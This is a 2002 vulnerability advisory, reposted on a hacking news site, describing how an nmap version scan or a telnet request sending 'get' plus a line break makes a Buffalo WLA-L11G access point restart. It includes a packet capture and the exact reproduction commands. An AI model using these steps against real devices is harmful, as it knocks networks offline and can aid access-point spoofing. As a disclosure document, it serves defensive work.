Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Buffalo AP Denial of Service

Buffalo AP Denial of Service

by Nikola Strahija on November 14th, 2002 While performing a network testing, we have found a Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply using network scanning tool such as nmap with version grabbing (www.insecure.org) in the following manner restarts the AP:


$ nmap -sVVV -p 80 192.168.177.250

where 192.168.177.250 is an IP address of Buffalo AP

Analysing network traffic shows the following:

14:16:14.622714 192.168.177.7.34968 >
192.168.177.250.www: S [tcp sum ok]
4001152576:4001152576(0) win 5840 1460,sackOK,timestamp 51
43788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id
49836, len 60)
0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07
E..<[email protected]@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000
..M....P.|[email protected]
0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a
....b...........
0x0030 004e 7cec 0000 0000 0103 0300
.N|.........

14:16:14.623498 192.168.177.250.www >
192.168.177.7.34968: S [tcp sum ok]
51008176:51008176(0) ack 4001152577 win 16000 1460> (ttl 3
0, id 2, len 44)
0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa
E..,.......x..M.
0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41
..M..P....R..|.A
0x0020 6012 3e80 b1e2 0000 0204 05b4 0000
`.>...........

14:16:14.623539 192.168.177.7.34968 >
192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49837, len 4
0)
0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07
E..([email protected]@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1
..M....P.|.A..R.
0x0020 5010 16d0 f14f 0000
P....O..

14:16:15.402518 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49838, len 4
6)
0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07
[email protected]@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1
..M....P.|.A..R.
0x0020 5018 16d0 08b2 0000 6765 7420 0d0a
P.......get...

14:16:15.647578 192.168.177.250.www >
192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win
16000 (ttl 30, id 3, len 40)
0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa
E..(.......{..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47
..M..P....R..|.G
0x0020 5010 3e80 c999 0000 0000 0000 0000
P.>...........

14:16:15.647639 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49839, len 4
2)
0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07
E..*[email protected]@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....

14:16:16.358599 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49840, len 4
2)
0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07
E..*[email protected]@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....

14:16:17.750198 arp who-has 192.168.177.250 tell
192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8
[email protected]
0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000
M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000
..............

14:16:17.798596 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49841, len 4
2)
0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07
E..*[email protected]@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....

14:16:20.274463 arp who-has 192.168.177.7 tell
192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8
[email protected]
0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000
M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000
..............

14:16:20.274488 arp reply 192.168.177.7 is-at
0:4:5a:63:a4:be
0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8
..........Zc....
0x0010 4d07 0007 4006 0656 c0a8 4dfa
[email protected]

14:16:20.275495 192.168.177.250.www >
192.168.177.7.34968: FR [tcp sum ok]
51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa
E..(.......}..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000
..M..P....R.....
0x0020 5005 0000 b4e9 0000 0000 0000 0000
P.............


Attacks can also be reproduced manually via telnet:

[email protected]:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0



Connection closed by foreign host.

and

[email protected]:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get

Connection closed by foreign host.

(where, there is a after get; without the
, the AP doesn't restart)

Impact: This vulnerability can be implemented by the
attacker to restart the AP. This might be useful if
the configuration files have been changed by the
attacker and the AP restart is required to implement
the changes. It is also possible to implement this
attack to spoof an AP and make the clients connect to
rouge or spoofed AP instead of legitimate one.

Risk Factor: Medium/High

According to the Arhont Ltd. policy, all of the found
vulnerabilities and security issues will be reported to
the manufacturer 7 days before releasing to public
domain (such as CERT and BUGTRAQ).

If you would like to get more information about this
issue, please do not hesitate to contact Arhont team.


Regards,

Andrei Mikhailovsky
Arhont Ltd.
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key: 0x178F548C


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »